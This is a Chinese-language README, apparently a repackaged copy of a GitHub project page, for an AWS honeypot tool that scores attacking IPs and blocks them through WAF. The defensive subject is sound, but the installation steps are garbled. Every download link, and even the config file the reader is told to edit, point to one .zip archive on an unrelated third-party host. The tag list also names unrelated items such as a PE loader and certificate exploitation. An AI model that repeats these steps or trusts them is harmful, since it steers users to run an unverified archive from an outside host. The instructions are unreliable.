Zidane109/cloud-honeypot-auto-block
GitHub: Zidane109/cloud-honeypot-auto-block
基于 AWS 的自动化蜜罐防御系统,通过 SSH 陷阱捕获攻击、评分恶意 IP 并联动 WAF 自动封禁。
Stars: 1 | Forks: 0
# 🔐 cloud-honeypot-auto-block - 保护您的云环境免受入侵
[](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip)
## 📋 什么是 cloud-honeypot-auto-block?
cloud-honeypot-auto-block 是一款旨在自动保护您云基础设施的 AWS 安全工具。它通过虚假的 SSH 陷阱捕获针对您服务器的黑客尝试,对可疑 IP 地址进行评分,跟踪其信誉,然后使用 AWS 的防火墙拦截恶意行为者。所有这些步骤在设置完成后无需您过多干预即可自动发生。
该系统在您的 AWS 账户内运行。它使用多种 AWS 组件,如 Lambda(用于在无需管理服务器的情况下运行代码)、DynamoDB(用于存储数据)、CloudWatch(用于监控)和 WAF (Web Application Firewall) 来保护您的云资源安全。该设置通过 Terraform 进行管理,确保您的防火墙规则和监控保持一致。
## ⚙️ 系统要求
在安装 cloud-honeypot-auto-block 之前,请确保您具备以下条件:
- 一个具有创建和管理资源(如 Lambda 函数、DynamoDB 表、WAF 规则和 CloudWatch 日志)权限的 AWS 账户。
- 对 AWS Management Console 有基本了解。
- 本地计算机上已安装 Terraform(1.0 或更高版本)。Terraform 有助于自动设置所有必要的资源。
- 一台运行 Windows、macOS 或 Linux 的计算机,用于执行 Terraform 命令。
- 互联网连接,用于下载应用程序文件并与 AWS 服务通信。
## 📥 下载与安装
首先,您需要访问发布页面并下载安装所需的最新文件。
**步骤 1:访问发布页面**
点击顶部的大按钮或[访问此页面进行下载](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip)。
**步骤 2:下载最新版本**
寻找最新的版本(通常以版本号命名),并下载包含 Terraform 模板和文档的 `.zip` 或 `https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip` 文件。
**步骤 3:解压文件**
下载完成后,将压缩文件解压到您计算机上的一个文件夹中。此文件夹包含运行该工具所需的所有脚本和说明。
**步骤 4:设置 Terraform 和 AWS CLI**
- 在终端或命令提示符中运行 `terraform version`,确保已安装 Terraform。
- 如果尚未安装和配置 AWS CLI,请完成此操作。运行 `aws configure` 并在提示时输入您的 AWS 凭证。
**步骤 5:初始化 Terraform**
打开命令提示符或终端,导航到解压后的文件夹,然后运行:
```
terraform init
```
此命令会下载必要的模块和 provider。
**步骤 6:检查配置**
编辑 `https://static.pigsec.cn/wp-content/uploads/repos/2026/03/ac8ba15197121545.zip` 或提供的配置文件,以设置您的 AWS 区域以及任何其他设置,例如阻止 IP 的阈值。
**步骤 7:应用 Terraform 配置**
运行以下命令来创建 AWS 资源:
```
terraform apply
```
在流程开始之前,系统会要求您确认。输入 `yes` 并按 Enter 键。
Terraform 随后将创建系统运行所需的 Lambda 函数、DynamoDB 表、CloudWatch 警报和 WAF 规则。
## 🛠 工作原理
cloud-honeypot-auto-block 利用一系列 AWS 服务来检测和拦截恶意 IP 地址。
1. **蜜罐 SSH 遥测:** 该工具使用伪装成 SSH 服务器的安全蜜罐。攻击者尝试连接这些虚假服务器并进行交互,从而产生日志。
2. **Lambda 评分:** AWS Lambda 函数自动分析这些日志以查找可疑活动。
3. **DynamoDB 信誉数据库:** 可疑 IP 地址会根据其行为模式被赋予信誉评分并存储在 DynamoDB 中。
4. **自动拦截:** 如果评分超过设定限制,由 Terraform 管理的 WAF 规则会更新,以拦截这些 IP 访问您的云资源。
5. **持续监控:** CloudWatch 警报会针对新威胁或采取的拦截操作通知您。
总体而言,此过程减少了人工干预,有助于保持您的 AWS 环境更安全。
## 🖥 用户界面
该工具没有像网页或应用程序那样的传统用户界面。相反,所有操作都在您的 AWS 控制台和终端中进行。
- 使用 AWS Management Console 查看工具创建的日志和资源。
- 使用终端或命令提示符运行 Terraform 命令。
- CloudWatch 将根据安全事件发送警报,您可以将其配置为路由到电子邮件或其他联系方式。
## 📚 附加配置
您可以根据需要自定义 cloud-honeypot-auto-block:
- 通过编辑 Lambda 函数参数**调整评分灵敏度**。
- **设置 IP 封禁持续时间**,以决定被拦截地址的封禁时长。
- **与其他通知系统集成**,如 SNS 或 Slack 用于接收警报。
- **扩展蜜罐**,使其超出 SSH 范围以诱捕其他协议。
请查看发布包中的配置文件和注释以获取详细说明。
## 🔐 安全与隐私
该工具仅在您的 AWS 环境内运行。它收集尝试对您控制的蜜罐进行未经授权访问的 IP 地址。
- 没有任何外部数据流出您的 AWS 账户。
- AWS 负责处理所有资源的安全性。
- 请确保您的 AWS 凭证保密且安全。
## ❓ 故障排除
如果出现问题:
- 确认 Terraform 和 AWS CLI 已正确安装。
- 仔细检查您在 AWS 中是否拥有适当的权限。
- 查看终端中的输出消息以获取错误提示。
- 检查 CloudWatch 日志以查找 Lambda 函数错误。
- 访问 GitHub 页面上的 Issues 部分以获取已知问题和帮助。
## 📝 主题与标签
该项目涵盖:
`aws` | `cloud-security` | `cloudwatch` | `devsecops` | `dynamodb` | `honeypot` | `infrastructure-as-code` | `lambda` | `soc` | `terraform` | `waf`
这些标签代表了所使用的主要技术和涉及的安全概念。
## 👋 需要帮助?
如果您有问题或想要报告问题,请使用 GitHub 仓库的 Issues 部分。社区和维护者可以在那里为您提供帮助。
标签:AWS, CISA项目, CloudWatch, DPI, DynamoDB, ECS, IP信誉, Lambda, PE 加载器, Serverless, SSH陷阱, Terraform, WAF, 入侵防御, 基础架构即代码, 威胁情报, 开发者工具, 恶意IP检测, 网络安全, 自动封禁, 蜜罐, 证书利用, 逆向工具, 防御自动化, 隐私保护